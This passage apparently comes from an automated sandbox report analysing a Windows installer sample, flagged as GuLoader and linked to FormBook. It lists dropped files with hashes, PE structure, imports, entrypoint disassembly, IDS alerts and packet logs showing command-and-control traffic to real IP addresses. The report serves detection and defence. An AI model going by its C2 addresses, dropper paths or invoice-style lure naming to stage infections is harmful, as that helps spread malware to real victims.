                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\Reorganisere.Cir, Author: Joe Security
                                                Reputation:low
                                                Preview:.3........T...........................#...Y...$$...EEE.?..........77....ggg.y............x.........................!.................lll...........=====....UU..&..+++.........................................;;.........o.........%.+.....d..........n........=..........&.........;...........~.............CC...........qq..................1....................EE.........OO..................,,.......................u...h.................55...................... .........C......######......7..f.....99.........................EEE..TTTTTT.@..'..llll.....<......................EEE....m..?.'.....L._____.........=..&&&.............&...xx..............#.....................................................SS........p...s..O...\.r.....h....Y......uu...eeee.D..........ee......................................................Z.222..........VV.A.88.U........................X.....kk........4444..@@.................mmmm......MM.A..].....rrrr......................0.]...................f..7..dd..............

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\closico.jpg

                                                Download File
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1000x1080, components 3
                                                Category:dropped
                                                Size (bytes):124664
                                                Entropy (8bit):7.89877865008063
                                                Encrypted:false
                                                SSDEEP:3072:zoTo6OkPl5nYyhXfxoyLyvrGKPQeYgdzigvrw8GbsWlT:8xPl5n1XpZ4Nk6rw8Gj9
                                                MD5:85392B11BEAA8A522DD01CC279FF7BA9
                                                SHA1:DC55B91783F7FCF12F464B7C1547402A32B12352
                                                SHA-256:DFCFF77F1BBB4F200B6D1CE6C7994372AEEB2AF922C19544EB263276A8DE98B4
                                                SHA-512:38907EEC15A0D805A4AB87D791D7684A262E2542CF999A47D3A8ED4EA78E2349449EC90F350B2AD8420C9D07D30A2B27A1125B71166AAB93EA4A0EC42ECB8125
                                                Malicious:false
                                                Reputation:low
                                                Preview:......JFIF.....H.H......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 4.4.0-Exiv2"> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:dc="http://purl.org/dc/elements/1.1/"> <dc:creator> <rdf:Seq> <rdf:li>VectorStock.com/8988055</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta>

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\gangtj.rem

                                                Download File
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):474147
                                                Entropy (8bit):1.2497915423628485
                                                Encrypted:false
                                                SSDEEP:1536:Pn8UXv4DaYQBLo6nhLDZoPrdYV/L4nv++eI:Pn8taRBntVv6eI
                                                MD5:B6FF1232C3CF4077EDA721ABC31189ED
                                                SHA1:A64C6B34BFE4FDBDEB06774CFE93833DB3B3B927
                                                SHA-256:625EF536F1E3F19884BDF7CCB43D0640AEF8B96C328576829F53198C4E9A3CB5
                                                SHA-512:5D243B654C2C8BFD66BB425C25352AD9263A8C8B74185FC1FBCE5E3F74A552B1D0320F1967748A1D929ACA8229C90A7A0B456D9D8D039F830882B28DA11D41BC
                                                Malicious:false
                                                Preview:x......................{........................................................................C.................................z..................................-............R..................................................................................................................l..................2..................................................................................G.@......C......(...................................................................................................................zB.......................................................................}......8............................................................................-.........x....................................................................U...........................................................I...........Q.......}.......................................................z....................................[.............(.........................""......................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\mytologiernes.mam

                                                Download File
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):36500
                                                Entropy (8bit):1.2374589016548323
                                                Encrypted:false
                                                SSDEEP:384:ljhCyY8Q+/jpNnvSULUEeOYUalMFWiRlK/U:KWXv/vsUSsl
                                                MD5:154A56CAB30829F200C479A1CEFB7D24
                                                SHA1:DD1CA6FF1D89D2DB271EA7AE4B546B62CF66C35D
                                                SHA-256:DE4698580013B6DA9D438C44DF514AA1F9C40F46CEE34426CA9E5F253BE3562F
                                                SHA-512:8F1D4C9752C5DDB14B9B241D5E9647DA3B35EB53692AF6995329A6AEBE5FFB270CD5A963385DDFD792F8F3C22233D9CE47ADEBF8E3BEACF9B5A1C58D66AB901F
                                                Malicious:false
                                                Preview:.....................]............A.......M!............._...............h................(..A..c......................5............\...........l.............................i........S............p...........................z..=...|............c..............................e..........................................................6........................................P................g......................<.......|.....9......e.............................+............................f.......................b..................................2..................................................................r........R......$..................................................R.....................................................................................1.......................)......................6.......z.....................................................O........................R.......y.....................................................................%.............

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\prosadigtets.Udt

                                                Download File
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):104098
                                                Entropy (8bit):2.6467864251696804
                                                Encrypted:false
                                                SSDEEP:1536:pniD90omAmJfPLgJ4M9bFdupg/GCGwnDJZl7JGc3VKJtzfCfVG5BYHkRq7dQL:piJ0FffOJLKzfL
                                                MD5:A90C0418EB0D9C92DCF7FD60DBD0E5AA
                                                SHA1:4E005092435A64CD7603866F213308FC7DFE7270
                                                SHA-256:0DE89DE7CA46CFA85AA81FF47F23AFFFB42AEC1F7C2ABAACFF7B1BAE477D4C66
                                                SHA-512:E8F972A5147EAF8FAFFA5E6ACE40C3607C5A72583465EF02B4257DD918C10854CF96FCD896F63F02CF08F78B2A6A658CCC281C0ADBCE5E1C3383A464752D0A7E
                                                Malicious:false
                                                Preview:001B00003333006800003800A5A50000C5000000000000008000000000BC00B000A5A5002700000000E2E2E2E200005C00A3A30000006F00000000000024240009090909090909090000D7006100CC00D0009B9B9B9B9B9B0000000000000047000000000061616100004C000000670073002B2B000030009A9A000000EC0000B1000000007C7C7C7C7C000E0E00CBCB000000002600A100001E1E1E00008B8B8B8B00B000AD00710000515100004800252500000303003F3F00004000C5C500E5E5000000006000007F00D800006A6A0000121200003B3B00F40000020200B800CF009800C800161616161600007D00000000000062002F000000000000E0000A00BE00004C00004E4E4E00F2F2F20038383800DBDB007D7D00000E00000F00000000003E00939393001D1D1D00002D0000001E00AD001313000032320000002E2E00949400200066005A000000AB000000000000DFDFDF005F5F00006100001500CBCBCBCB005500454500E200000000000000202020202020000000C2C200000079797900000000007373730000540054001F00CCCCCCCC00000000AFAF0000B6B6009292000000000000004040400000909000E4E4E400001300FB0000006100A9A9A9000000AF00004A000000F5005454000000000000004C4C00DBDBDB00E300CFCF00900000F200E500B000F300000000

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\unexpansively.hom

                                                Download File
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):71522
                                                Entropy (8bit):1.2523976755847652
                                                Encrypted:false
                                                SSDEEP:384:AzbMD4epdEp9mqkQUa12jVmdCLXDCBBdT0BWavZHmQ0ScJt9Hvb9Mnnwt8S0NXh0:WX1NiuDdT0HFcJt9PRSrS0Nhlx3Pq5
                                                MD5:53BDC75CA85CE26720653222D6FF307E
                                                SHA1:37A1B4BE95D98F63CF8C21DD2506E5B06B4832E7
                                                SHA-256:1950BE1727DB7C86505D3E16DDFCE4B031057A77A109E4528DE646B93567414E
                                                SHA-512:F8F22E981F8D3102260AD2A19BCF6ECC87EC3B48AD9B2582D3EE0E3F689FF4E98F19B52533A001F863611374B0C3A2463602E2531A29B61617C624DAC3B57314
                                                Malicious:false
                                                Preview:.............;.........../.............v.....L..............)..............................................+.....<............w.........................................H..................................................................._...........=..........C................$......................../..................................O........C...............................................................................................O..............................................................".."................................N.......a..$.......................................b................................................................c..................K............-..................1.......S..........U..................................2..[..&f..................s...............l..........M.........S.......?...............................................a.......................................a.................e... .........................................................

                                                C:\Users\user\AppData\Local\Temp\aw8-5Gi

                                                Download File
                                                Process:C:\Windows\SysWOW64\rasphone.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                Category:dropped
                                                Size (bytes):135168
                                                Entropy (8bit):1.1142956103012707
                                                Encrypted:false
                                                SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):5632
                                                Entropy (8bit):3.817430038996001
                                                Encrypted:false
                                                SSDEEP:48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
                                                MD5:549EE11198143574F4D9953198A09FE8
                                                SHA1:2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
                                                SHA-256:131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
                                                SHA-512:0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious, Browse
                                                • Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious, Browse
                                                • Filename: Thermo Fisher RFQ_TFS-1207.com.exe, Detection: malicious, Browse
                                                • Filename: Thermo Fisher RFQ_TFS-1207.com.exe, Detection: malicious, Browse
                                                • Filename: TRIAL_ORDER_CP.exe, Detection: malicious, Browse
                                                • Filename: TRIAL_ORDER_CP.exe, Detection: malicious, Browse
                                                • Filename: Thermo Fisher RFQ_TFS-1805.xls, Detection: malicious, Browse
                                                • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                                • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):5.804946284177748
                                                Encrypted:false
                                                SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\militriskes.lnk

                                                Download File
                                                Process:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                Category:dropped
                                                Size (bytes):533
                                                Entropy (8bit):3.1634456852441932
                                                Encrypted:false
                                                SSDEEP:12:8wl0mkLNSKw3zKw3s+Q1olfW+kjcmAUcS+:8PAZGizZec1
                                                MD5:2FA011523D427A6E8872826710C1AF65
                                                SHA1:F0AE97A4E4A8B2BC8E2D83EF413B66DCBF115CF6
                                                SHA-256:58499F44485164D34959BBB75B1FF385B07032E42DC974087B9C993BF91B78E9
                                                SHA-512:12D6F2812C1A8375462664426B90E9100F67B9F8F6D5FB17DD3F4BD12C1B9C7D186B377260C938D27B5DB2C63F9278A8130DCF88BC8EDE56AD4C328D53953378
                                                Malicious:false
                                                Preview:L..................F.............................................................P.O. .:i.....+00.../C:\.....................2...........Transformationsmodeller.Tri12.l............................................T.r.a.n.s.f.o.r.m.a.t.i.o.n.s.m.o.d.e.l.l.e.r...T.r.i.1.2...,...2.....\.....\.....\.....\.....\.....\.....\.T.r.a.n.s.f.o.r.m.a.t.i.o.n.s.m.o.d.e.l.l.e.r...T.r.i.1.2.J.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.s.t.e.e.l.m.a.k.e.\.b.i.m.l.e.t.....

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.913091230700521
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                File size:578'322 bytes
                                                MD5:66d651e5546dedafd0a252400b70c21d
                                                SHA1:e7d2f22f36489ab390a293bc9e0b048df09675f1
                                                SHA256:94df904f108f2aa1f8ffdbe2d119ac899fe12e664057792c51662878fdeb21ec
                                                SHA512:12875f74010fcf30c40675cb667aff29012754b67b4d0bd5b2883ea78cde7234942287d6ca129f0c52a05617704e080b97cf3253d890c6bb24b1a9919d343eaf
                                                SSDEEP:12288:KXb+e00Q9gJNxIbmOM20k8Lrb9QBc2qg3PdONLzJ2/+poNM730+C08Apw:KXbTm9pgLXQBP4Nf4gfC5
                                                TLSH:B9C4124473A08227DAA492307E628BF76EE8B4170760079B77FADABDBD31143961B1D4
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....

                                                File Icon

                                                Icon Hash:e98e43534d47331b

                                                Static PE Info

                                                General

                                                Entrypoint:0x40351c
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 000003F8h
                                                push ebp
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebp, ebp
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebp
                                                mov dword ptr [esp+18h], 0040A2D8h
                                                mov dword ptr [esp+14h], ebp
                                                call dword ptr [004080A4h]
                                                mov esi, dword ptr [004080A8h]
                                                lea eax, dword ptr [esp+34h]
                                                push eax
                                                mov dword ptr [esp+4Ch], ebp
                                                mov dword ptr [esp+0000014Ch], ebp
                                                mov dword ptr [esp+00000150h], ebp
                                                mov dword ptr [esp+38h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007FE3CCBEB0DAh
                                                lea eax, dword ptr [esp+34h]
                                                mov dword ptr [esp+34h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [esp+48h]
                                                mov ecx, dword ptr [esp+62h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [esp+0000014Eh], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [esp+00000148h], ax
                                                cmp dword ptr [esp+38h], 0Ah
                                                jnc 00007FE3CCBEB0A8h
                                                and word ptr [esp+42h], 0000h
                                                mov eax, dword ptr [esp+40h]
                                                movzx ecx, byte ptr [esp+3Ch]
                                                mov dword ptr [00429AD8h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [esp+38h]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [esp+00000148h]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx
                                                movzx ecx, byte ptr [esp+0000004Eh]

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x82c8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x65760x66001e4066ed6e7440cc449c401dfd9ca64fFalse0.6663219975490197data6.461246686118911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x1fb380x6002e1d49b2855a89e6218e118f0c182b81False0.5026041666666666data4.044293204800279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x2a0000x290000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x530000x82c80x8400179962530ffa5dbbe5ab5936018f02dbFalse0.4229107481060606data5.222625912327323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x534480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3934647302904564
                                                RT_ICON0x559f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.47701688555347094
                                                RT_ICON0x56a980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5007995735607675
                                                RT_ICON0x579400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5684426229508197
                                                RT_ICON0x582c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.552797833935018
                                                RT_ICON0x58b700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.5132488479262672
                                                RT_ICON0x592380x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.2530487804878049
                                                RT_ICON0x598a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4111271676300578
                                                RT_ICON0x59e080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6524822695035462
                                                RT_ICON0x5a2700x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.34139784946236557
                                                RT_ICON0x5a5580x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.38934426229508196
                                                RT_ICON0x5a7400x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.44256756756756754
                                                RT_DIALOG0x5a8680xb8dataEnglishUnited States0.6467391304347826
                                                RT_DIALOG0x5a9200x144dataEnglishUnited States0.5216049382716049
                                                RT_DIALOG0x5aa680x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0x5ab680x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0x5ac880x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x5ace80xaedataEnglishUnited States0.5919540229885057
                                                RT_VERSION0x5ad980x2a0dataEnglishUnited States0.5014880952380952
                                                RT_MANIFEST0x5b0380x290XML 1.0 document, ASCII text, with very long lines (656), with no line terminatorsEnglishUnited States0.5625

                                                Imports

                                                DLLImport
                                                ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2025-01-15T18:20:23.968838+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049762212.162.149.16580TCP
                                                2025-01-15T18:20:58.019349+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204976367.223.117.18980TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 15, 2025 18:20:23.685247898 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:23.825747967 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:23.826055050 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:23.826337099 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:23.968616009 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:23.968683004 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:23.968728065 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:23.968771935 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:23.968837976 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:23.968837976 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:23.968933105 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:23.969055891 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.110039949 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.110100031 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.110145092 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.110188007 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.110254049 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.110260010 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.110254049 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.110305071 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.110348940 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.110404015 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.110475063 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.110599041 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.110675097 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.251238108 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.251298904 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.251343966 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.251530886 CET4976280192.168.11.20212.162.149.165
